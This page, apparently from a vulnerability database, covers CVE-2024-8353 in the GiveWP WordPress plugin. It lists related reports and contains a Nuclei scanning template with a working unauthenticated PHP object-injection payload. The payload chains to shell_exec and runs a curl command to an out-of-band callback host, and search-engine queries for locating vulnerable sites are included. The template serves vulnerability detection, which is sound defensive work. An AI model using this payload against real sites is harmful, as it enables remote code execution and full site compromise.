| Reporter | Title | Published | Views | Family All 18 |
|---|---|---|---|---|
| Exploit for Deserialization of Untrusted Data in Givewp | 30 Sep 202417:33 | – | githubexploit | |
| Exploit for Deserialization of Untrusted Data in Givewp | 21 Aug 202409:51 | – | githubexploit | |
| CVE-2024-8353 | 28 Aug 202420:39 | – | circl | |
| WordPress plugin GiveWP 代码问题漏洞 | 28 Sep 202400:00 | – | cnnvd | |
| CVE-2024-8353 | 28 Sep 202402:04 | – | cve | |
| CVE-2024-8353 GiveWP – Donation Plugin and Fundraising Platform <= 3.16.1 - Unauthenticated PHP Object Injection | 28 Sep 202402:04 | – | cvelist | |
| GiveWP Unauthenticated Donation Process Exploit | 29 Aug 202418:53 | – | metasploit | |
| CVE-2024-8353 | 28 Sep 202402:15 | – | nvd | |
| WordPress GiveWP Plugin < 3.16.2 Multiple vulnerabilities | 16 Oct 202400:00 | – | openvas | |
| CVE-2024-8353 | 28 Sep 202402:15 | – | osv |
id: CVE-2024-8353
info:
name: GiveWP Donation Plugin <= 3.16.1 - Unauthenticated PHP Object Injection
author: hnd3884
severity: critical
description: |
The GiveWP – Donation Plugin and Fundraising Platform plugin for WordPress is vulnerable to PHP Object Injection in all versions up to, and including, 3.16.1. This is due to insufficient input validation on user-supplied data. An unauthenticated attacker can inject a serialized PHP object, which may allow them to execute arbitrary PHP code, depending on the presence of a suitable POP chain on the target system. This vulnerability could lead to full site compromise.
impact: |
Unauthenticated attackers can inject serialized PHP objects to execute arbitrary PHP code through POP chains, potentially achieving full site compromise, complete server control, and access to all WordPress data.
remediation: |
Update GiveWP plugin to version 3.16.2 or later to address the PHP object injection vulnerability.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2024-8353
- https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/give/givewp-donation-plugin-and-fundraising-platform-3161-unauthenticated-php-object-injection
- https://plugins.trac.wordpress.org/browser/give/trunk/readme.txt
- https://plugins.trac.wordpress.org/browser/give/tags/3.16.0/includes/process-donation.php#L154
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
cvss-score: 10
cve-id: CVE-2024-8353
cwe-id: CWE-502
epss-score: 0.28931
epss-percentile: 0.97919
cpe: cpe:2.3:a:givewp:givewp:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
vendor: givewp
product: givewp
framework: wordpress
shodan-query: http.html:"/wp-content/plugins/give/"
fofa-query: body="/wp-content/plugins/give/"
publicwww-query: "/wp-content/plugins/give/"
tags: cve,cve2024,wordpress,wp,wp-plugin,givewp,rce,unauth,vkev,vuln
variables:
cmd: "curl+http://test.{{interactsh-url}}"
length: "{{len(cmd)}}"
cred: "{{rand_text_alpha(8)}}"
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=give_form_search
extractors:
- type: json
name: id
json:
- ".[0].id"
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
action=give_donation_form_nonce&give_form_id={{id}}
extractors:
- type: json
name: nonce
json:
- ".data"
internal: true
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
give-form-id={{id}}&give-form-hash={{nonce}}&give-price-id=0&give-amount=10&give_first={{cred}}&give_last={{cred}}&give_email={{cred}}%40example.org&give_title=%5CO%3A19%3A%22Stripe%5C%5C%5C%5CStripeObject%22%3A1%3A%7Bs%3A10%3A%22%5C0%2A%5C0_values%22%3Ba%3A1%3A%7Bs%3A3%3A%22foo%22%3BO%3A62%3A%22Give%5C%5C%5C%5CPaymentGateways%5C%5C%5C%5CDataTransferObjects%5C%5C%5C%5CGiveInsertPaymentData%22%3A1%3A%7Bs%3A8%3A%22userInfo%22%3Ba%3A1%3A%7Bs%3A7%3A%22address%22%3BO%3A4%3A%22Give%22%3A1%3A%7Bs%3A12%3A%22%5C0%2A%5C0container%22%3BO%3A33%3A%22Give%5C%5C%5C%5CVendors%5C%5C%5C%5CFaker%5C%5C%5C%5CValidGenerator%22%3A3%3A%7Bs%3A12%3A%22%5C0%2A%5C0validator%22%3Bs%3A10%3A%22shell_exec%22%3Bs%3A12%3A%22%5C0%2A%5C0generator%22%3BO%3A34%3A%22Give%5C%5C%5C%5COnboarding%5C%5C%5C%5CSettingsRepository%22%3A1%3A%7Bs%3A11%3A%22%5C0%2A%5C0settings%22%3Ba%3A1%3A%7Bs%3A8%3A%22address1%22%3Bs%3A{{length}}%3A%22{{cmd}}%22%3B%7D%7Ds%3A13%3A%22%5C0%2A%5C0maxRetries%22%3Bi%3A10%3B%7D%7D%7D%7D%7D%7D&give-gateway=offline&action=give_process_donation
matchers:
- type: dsl
dsl:
- contains(interactsh_protocol, 'dns')
- contains(content_type, "text/html")
- status_code == 500
condition: and
# digest: 4a0a00473045022100cfe0d855448c4b1e502e25e8fd08ee01a5a79708766b4eee1e78e766db9efeb002201cf1608e3463b03f52fbfff49236fa0de62d7893cd01e93a147dee7f8fa60727:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation